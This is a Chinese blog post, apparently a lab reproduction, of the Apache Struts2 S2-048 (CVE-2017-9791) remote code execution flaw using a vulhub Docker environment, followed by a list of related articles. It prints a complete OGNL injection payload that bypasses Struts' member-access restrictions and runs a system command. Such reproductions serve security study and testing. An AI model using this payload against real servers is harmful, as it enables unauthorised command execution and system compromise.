struts2--(CVE-2017-9791)s2-048

最新推荐文章于 2024-05-17 16:26:43 发布
最新推荐文章于 2024-05-17 16:26:43 发布
阅读量113 收藏
点赞数
文章标签: web安全 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lucky1youzi/article/details/129497314
版权

  • 漏洞简介

当使用了Struts2 Struts1 插件时,可能导致不受信任的输入传入到ActionMessage类种导致命令执行

  • 影响范围

2.3x

  • 漏洞复现

开启vulhub环境 执行命令

docker-compose up -d

访问靶场

http://ip:8080/showcase
${4*4}

可以看到计算结果回显出来了

写入poc,成功执行id命令

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

最后关闭vulhub,执行

docker-compose down

Lucky1youzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
s2-048Struts2 反序列化漏洞
weixin_45253622的博客
12-14 1220
Struts2 Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序。 漏洞复现
S2-048
weixin_30653097的博客
05-05 74
前言 S2-048漏洞和struts2-struts1-plugin插件有关,该插件用于将Struts1的action也能在struts2上运行,提高兼容性(作用是我猜的~) 正文 我们先看下这个插件对应的配置文件 可以看到我们访问名为saveGangster的action时,处理它的并不是SaveGangsterAction,而是插件中的一个action类org....
Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791
最新发布
qq_51780583的博客
05-17 176
Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791
S2-048(RCE远程代码执行)
浅笑996的博客
11-23 1619
环境搭建: https://blog.csdn.net/qq_36374896/article/details/84145020 进入漏洞环境 cd vulhub-master/struts2/s2-048/ 启动s2-048环境: sudo docker-compose up 访问目标主机地址: http://192.168.91.130:8080/showcase/ 访问Integrat...
漏洞之S2-048 远程代码执行漏洞(CVE-2017-9791)
shy的博客
02-17 994
S2-048 远程代码执行漏洞(CVE-2017-9791)
S2-048 远程代码执行漏洞检测利用
a1b2c3是弱口令
12-11 1691
2017年7月7日,ApacheStruts 发布最新的安全公告,Apache Struts2的strus1插件存在远程代码执行的高危漏洞,漏洞编号为 CVE-2017-9791S2-048)。攻击者可以构造恶意的字段值通过Struts2struts2-struts1-plugin插件,远程执行代码。 漏洞记录 S2-048 CVE-2017-9791 Struts 2.3.X http:...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞,漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值...
xalanjava源码-study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-150
06-05
S2-054、S2-055 和 Jackson 漏洞 CVE-2017-7525、CVE-2017-15095 调查报告 我们发表了一篇总结文章,只总结了要点,便于阅读。推荐给那些想要获得概览或没有空闲时间的人。 SSTtechlog 08 S2-054、S2-055 和 jackson...
struts2-core-2.3.31.jar
10-09
该漏洞与Apache Struts2S2-045)远程代码执行漏洞原理基本相同,均是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过发送恶意的数据包,利用该漏洞在受影响服务器上执行任意...
Struts2-057漏洞检测python脚本
11-04
Struts2-057漏洞,也被称为CVE-2017-9805,是Apache Struts2框架中的一个严重安全漏洞。这个漏洞主要出现在Struts2的`Struts2 REST Plugin`中,允许远程攻击者通过恶意构建的HTTP请求头执行任意系统命令,从而对...
S2-048 远程代码执行漏洞
EC_Carrot的博客
08-12 243
漏洞简介 影响版本: 2.0.0 - 2.3.32 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-048/README.zh-cn.md 漏洞复现 我用的是vulhub的环境,访问http://your_Ip:8080/integration/editGangster.action页面,触发OGNL表达式的位置是Gangster Name这个表单,在vulhub的文章中,作者改了S2-045的沙盒绕过的POC,直接将POC填入表单即
Struts2反序列化漏洞复现
热门推荐
wangyuxiang946的博客
07-20 1万+
作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。环境: vulhub。
s2-048远程代码执行漏洞
Stephen Wolf
11-22 537
一、漏洞描述 触发OGNL表达式的位置是`Gangster Name`这个表单 影响版本 2.0.0 - 2.3.32 二、环境搭建 vulhub靶场搭建 三、漏洞复现 这个环境是直接下载的struts-2.3.32的showcase,部署在tomcat-8.5下。环境启动后,访问`http://your-ip:8080/sho...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048CVE-2017-9791
qq_51577576的博客
12-16 1282
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048CVE-2017-9791) Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行,导致任意代码执行。
【Vulfocus解题复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791
温氏效应
09-04 3814
漏洞介绍 名称:Struts2 S2-048 远程命令执行漏洞 CVE标识符:CVE-2017-9791 描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 攻击者构造恶意字段值(value)通过Struts2struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。 解题过程 1、打开靶场环境 2、.
Apache Struts2--048远程代码执行漏洞复现
m0_48520508的博客
12-28 599
0x00简介 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当A.
java struts2 漏洞复现合集
whatday的专栏
08-31 4068
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
searchsploit windows-kernel-exploits\CVE-2017-0213\CvE-2017-0213.cpp这是什么意思
07-12
这个命令是在 SearchSploit 工具中搜索 Windows 内核漏洞 CVE-2017-0213 的相关信息。`searchsploit` 是一个用于搜索漏洞利用代码的命令行工具,`windows-kernel-exploits` 是一个目录,指定了搜索的范围,`CVE-2017-0213` 是具体的漏洞标识符,`CvE-2017-0213.cpp` 则是具体的利用代码文件名。通过执行这个命令,可以查找到与该漏洞相关的利用代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值